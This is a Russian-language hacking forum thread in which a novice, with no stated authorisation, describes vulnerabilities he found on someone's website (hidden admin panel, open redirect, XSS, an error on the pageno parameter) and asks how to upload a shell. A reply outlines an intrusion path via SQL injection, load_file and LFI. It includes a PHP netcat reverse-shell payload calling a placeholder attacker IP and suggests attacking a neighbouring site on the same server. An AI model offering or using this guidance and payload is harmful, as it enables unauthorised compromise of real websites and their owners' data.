Как эксплуатировать уязвимость на веб сайте?

enlistedhen

New member
27.07.2022
1
0
BIT
0
Всем ку, есть сайт и множество уязвимостей на нём, в связи с моим ламерством, найти то я нашел, а шелл банально не могу загрузить.
Сайт представляет собой одну видимую для пользователей страничку, но пройдясь ffuf'ом была найдена админка. В админку пробился - там меня ждала форма вставки ссылок
1658905412120.png
, форма принимает не только ссылки, а вообще любое значение
1658905590669.png
, на этом скрине я написал в форму для ссылок цифру 1, и при нажатии кнопки на главной странице меня кидает по этому пути,
1658905826975.png
, за редирект как я понял отвечает loader.php, кстати ссылки(например на мой сайт) кстати тоже работают и при нажатии кнопки происходит редирект, но это не то что нужно. Требуется загрузить свой шел. Еще найденные уязвимости - в форму для загрузки ссылок можно кинуть алерт, еще на админке есть форма с последними скачками файлов
1658906283509.png
, при изменении параметра pageno=что угодно, вылезает такая ошибка
1658906422052.png
. Куда рыть, чтоб загрузить свой шелл? Заранее извиняюсь за неправильно оформленную тему, и пните если я пишу не в тот раздел.
 

Вложения

  • 1658906081504.png
    1658906081504.png
    20,5 КБ · Просмотры: 112

apache2

Green Team
26.02.2021
42
22
BIT
302
Надо больше рыскать сайт, может ты найдёшь sql и зальёшь с помощью load_file туда свой e.g <?passthru("nc -e /bin/sh superIP superPORT");?> и потом через LFI достанешь и получишь shell. Если нет то возможно на одном сервере стоит ещё сайт, там могут быть тоже уязвимости и взломав тот сайт ты взломаешь и этот.
Я тоже только учусь, и сходу не могу сказать что делать, но знаю одно... Надо тыкать каждую чёртову кнопку и искать и пробывать уязвимости. Не знаешь как? Берём гугл читаем изучаем, читаем owasp top 10 и всё остальное.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!